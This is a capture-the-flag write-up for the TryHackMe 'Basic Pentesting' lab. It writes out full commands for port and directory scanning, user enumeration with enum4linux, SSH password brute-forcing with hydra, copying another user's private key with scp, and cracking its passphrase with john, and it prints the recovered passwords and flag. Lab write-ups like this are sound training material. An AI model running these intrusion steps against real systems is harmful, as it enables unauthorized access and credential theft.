Basic Pentesting (Try Hack Me Writeup)


URL : https://tryhackme.com/room/basicpentestingjt

  • Target IP : 10.10.165.235

Scanning

  • nmap -A 10.10.165.235
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 04:40 EDT
Nmap scan report for 10.10.165.235
Host is up (0.27s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: | Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
    Host script results:
    |_clock-skew: mean: 1h20m01s, deviation: 2h18m34s, median: 0s
    |_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    | smb-os-discovery: 
    |   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
    |   Computer name: basic2
    |   NetBIOS computer name: BASIC2\x00
    |   Domain name: \x00
    |   FQDN: basic2
    |_  System time: 2021-07-24T04:41:05-04:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2021-07-24T08:41:04
    |_  start_date: N/A

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 52.95 seconds

Access Website (80 port)

  • Use dirsearch
    • python3 dirsearch.py -u http://10.10.165.235/ -e all
  • Question1 : What is the name of the hidden directory on the web server(enter name without /)?
    • development
  • After access the development page, we can get 2 files
    • They are some mail from J and K to talk about some upgrade smb issue.

Try to find the username

  • enum4linux 10.10.165.235 -a
    • So there are 2 username we find
      • kay and jan
  • Although the verison of SSH services is 7.2p2, it has a vulnerability with Username Enumeration
    • https://www.exploit-db.com/exploits/40136
    • But I have tried and it doesn’t work

What is the password?

  • We need to burp force the password for these 2 users
  • Use hydra to check with rockyou.txt
    • hydra -l kay -P /opt/rockyou.txt ssh://10.10.165.235
    • hydra -l jan -P /opt/rockyou.txt ssh://10.10.165.235
      • We find the password : armando with user jan

Login into ssh services with jan’s credential

  • ssh jan@10.10.165.235
  • We are login with jan, but we can’t cat /home/kay/pass.bak
  • And then we find some cool things at `/home/kay/.ssh‵
    • This is the login key file he/she forgot to remove, so we can login with ssh without password, we can try to scp it to our computer by scp -r jan@10.10.165.235:/home/kay/.ssh .
  • Use ssh command to try to login with kay
    • chmod 600 id_rsa
    • ssh kay@10.10.165.235 -i id_rsa
    • But the key file needs password, so we need to crak

Crack ssh key

  • Use ssh2john
  • python ssh2john.py id_rsa > john_ssh
  • Run john with wordlist rockyou
    • john john_ssh --wordlist=/opt/rockyou.txt
    • So password is beeswax

Use key file and password to login with ssh

  • And we can find the final flag!
    • heresareallystrongpasswordthatfollowsthepasswordpolicy

Final Screenshot

,

發表迴響